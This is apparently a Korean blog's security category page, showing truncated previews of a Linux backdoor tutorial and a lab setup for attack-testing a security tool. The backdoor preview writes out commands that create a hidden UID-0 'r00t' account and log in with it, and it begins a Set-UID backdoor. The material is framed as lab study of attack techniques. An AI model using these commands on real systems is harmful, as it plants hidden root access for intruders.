Linux/보안 썸네일형 리스트형 리눅스 백도어 o 리눅스의 공격기법 분석 백도어 종류 1. passwd 백도어 - /etc/passwd 에 숨겨서 나중에 다시 접속을 할 때 사용한다. # useradd -u 0 r00t # useradd -o -u 0 r00t # passwd r00t # ssh r00t@localhost r00t@localhost's password: Last login: Wed Jul 29 21:21:42 2015 from 192.168.56.1 # id uid=0(root) gid=551(r00t) groups=551(r00t) ~~~~~~~~~~~ 2. Set-UID 백도어 - 일반 유저가 실행파일을 실행시키면 관리자 권한으로 변경된다. # useradd testuser # cd ~testuser # vi backdoor.c .. 더보기 보안도구 제작 ======================================================================IPTABLES-LAB> 보안도구를 작성한 후에 공격 테스트를 해보자. Attacker(BT) : 192.168.56.240 Victim(CentOS) : 192.168.56.200 공격형태 : White box test - Attacker 설정 - 1. bt 부팅 2. ssh 로 로그인 3. 공격 1. bt 부팅 - root/toor - VB Guest OS 생성 ( Ubuntu, 32bit 세팅 ), eth1 추가 Attacker# startx 2. ssh 로 로그인 Attacler# ifconfig eth1:0 192.168.56.240 Attacker# sshd-genera.. 더보기 이전 1 다음